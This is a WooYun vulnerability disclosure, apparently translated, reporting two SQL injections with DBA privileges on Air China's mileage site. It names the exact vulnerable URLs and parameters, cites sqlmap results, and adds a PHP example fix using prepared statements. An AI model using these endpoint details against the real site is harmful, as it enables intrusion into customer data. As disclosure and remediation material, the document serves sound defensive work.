
Vulnerability summary

Defect ID: wooyun-2014-048763

Title: Two SQL injection vulnerabilities on an Air China subsite (DBA privileges)

Vendor: Air China Limited (中国国际航空股份有限公司)

Author: sex is not show

Submitted: 2014-01-13 15:38

Fix deadline: 2014-01-18 15:39

Published: 2014-01-18 15:39

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 15

Status: Vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-01-13: Details sent to the vendor; awaiting the vendor's handling
2014-01-18: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Two SQL injections

Detailed description:

Air China mileage site (mymiles)
Injection points:
http://www.mymiles.com.cn/d/District_list.php?key=4 (the key parameter is injectable)
http://www.mymiles.com.cn/listlocationhx.php?Locationhx=%B1%B1%BE%A9%C4%CF%D4%B7%B9%FA%BC%CA%BB%FA%B3%A1&Ltype=S&City=%B1%B1%BE%A9 (the City parameter is injectable)
Run through sqlmap:

[screenshot: 1.jpg]

Current user:

[screenshot: 2.jpg]

DBA privileges:

[screenshot: 3.jpg]

Now the databases, quite a few of them...

[screenshot: 1.jpg]

And the tables...

[screenshot: 1.jpg]

[sqlmap output: list of 498 table names omitted]
DBA privileges, cross-database access possible, could do XXX; stopping here. Hoping for a bit more reward for the effort.

Proof of vulnerability:

[screenshot: 3.jpg]

[screenshot: 1.jpg]

[screenshot: 1.jpg]

Fix recommendation:

Parameter filtering.
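Filtering alone is fragile; the durable fix for the two endpoints above is to type-check the parameter where possible and bind every value through a prepared statement. The following is an added example, not code from mymiles.com.cn or from this report; table and column names, the DSN and the credentials are hypothetical placeholders, while key, Locationhx and City are the request parameters the report names.

```php
<?php
// Added example (not code from mymiles.com.cn or WooYun). Table and column
// names are hypothetical; key, Locationhx and City are the request
// parameters named in the report.

// Vulnerable pattern (hypothetical): the request value is spliced into the
// SQL text, so whatever follows "key=" in the URL is parsed as SQL.
function districtListUnsafe(PDO $db, string $key): array {
    $sql = 'SELECT id, name FROM district WHERE key_id = ' . $key;
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Fixed: enforce the expected type, then bind the value as a parameter so
// the database receives it as data, never as SQL text.
function districtList(PDO $db, string $rawKey): array {
    $key = filter_var($rawKey, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($key === false) {
        http_response_code(400);   // reject; do not "clean" and continue
        return [];
    }
    $stmt = $db->prepare('SELECT id, name FROM district WHERE key_id = :key');
    $stmt->bindValue(':key', $key, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Free-text parameters (City, Locationhx) cannot be reduced to an integer:
// cap their length and bind them as strings. Stripping quotes or keywords
// is not a substitute for binding.
function locationList(PDO $db, string $city, string $locationhx): array {
    if (mb_strlen($city) > 64 || mb_strlen($locationhx) > 128) {
        http_response_code(400);
        return [];
    }
    $stmt = $db->prepare('SELECT name, address FROM location WHERE city = :city AND hx = :hx');
    $stmt->bindValue(':city', $city, PDO::PARAM_STR);
    $stmt->bindValue(':hx', $locationhx, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Connection with emulated prepares off, so binding happens server-side.
// DSN and credentials are placeholders; use a low-privilege application
// account, not one holding DBA rights as in the report.
$db = new PDO('PLACEHOLDER_DSN', 'app_user', 'PLACEHOLDER_PASSWORD', [
    PDO::ATTR_EMULATE_PREPARES => false,
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
]);
print_r(districtList($db, $_GET['key'] ?? ''));
print_r(locationList($db, $_GET['City'] ?? '', $_GET['Locationhx'] ?? ''));
```

Binding fixes the injection itself; the DBA-level account the report demonstrates is a separate finding, since even a bound query running as DBA leaves cross-schema reads one application bug away.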

Copyright notice: when reposting, please credit the source, sex is not show@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: No impact; vendor ignored

Ignored at: 2014-01-18 15:39

Vendor reply:

Latest status:

None yet